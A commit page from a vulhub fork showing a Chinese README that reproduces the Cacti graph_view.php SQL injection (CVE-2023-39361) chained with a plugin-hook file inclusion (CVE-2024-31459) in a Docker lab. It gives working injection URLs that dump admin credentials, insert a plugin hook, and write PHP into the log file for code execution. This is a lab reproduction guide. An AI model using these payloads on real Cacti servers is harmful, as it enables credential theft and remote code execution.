aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

58
cacti/CVE-2023-39361/README.zh-cn.md Normal file
View File

@@ -0,0 +1,58 @@
# Cacti graph_view.php SQL注入导致远程代码执行漏洞CVE-2023-39361/CVE-2024-31459
Cacti是一个全面的网络图形化解决方案旨在利用RRDTool的数据存储和图形功能为网络管理员提供直观的界面来监控和分析网络性能数据。
在Cacti 1.2.24及更早版本中graph_view.php文件存在一个严重的漏洞当启用guest用户时未经任何身份验证的攻击者通过'rfilter'参数即可执行SQL注入攻击最终可能导致远程代码执行。
参考链接:
- <https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg>
- <https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv>
## 环境搭建
执行以下命令启动Cacti 1.2.24服务器:
```
docker compose up -d
```
服务器启动后,访问`http://your-ip:8080`进入Cacti界面。默认凭据为admin/admin。
请以管理员身份登录并按照初始化说明进行操作。只需重复点击"下一步"按钮,直到看到成功页面。
该漏洞如果需要未认证利用必须启用guest用户。你可以以管理员身份登录导航至`Configuration -> Authentication`页面并启用guest用户
![](1.png)
## 漏洞复现
该漏洞位于`graph_view.php`文件中的`grow_right_pane_tree`函数内。当action参数设置为'tree_content'时用户输入的rfilter参数由`html_validate_tree_vars`函数验证。然而这种验证仅确保输入是有效的正则表达式无法防止SQL注入。
要利用此漏洞向graph_view.php端点发送带有以下参数的请求
```
http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,(select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201),4,5,6,(select%20user()),(select%20version()),9,10%23
```
可见,数据库信息和管理员账号密码已被爆出:
![](2.png)
由于Cacti支持堆叠查询你可以利用此漏洞结合[CVE-2024-31459](https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv)实现本地文件包含。
首先,添加一个指向`log/cacti.log`文件的新插件钩子:
```
http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("));INSERT%20INTO%20plugin_hooks(name,hook,file,status)%20VALUES%20(".","login_before","../log/cacti.log",1);%23
```
然后利用报错SQL注入将PHP代码写入`log/cacti.log`文件:
```
http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,3,4,5,6,updatexml(rand(),concat(0x7e,"<?php%20phpinfo();?>",0x7e),null),8,9,10%23
```
此时访问登录页面时PHPINFO函数将执行并显示
![](3.png)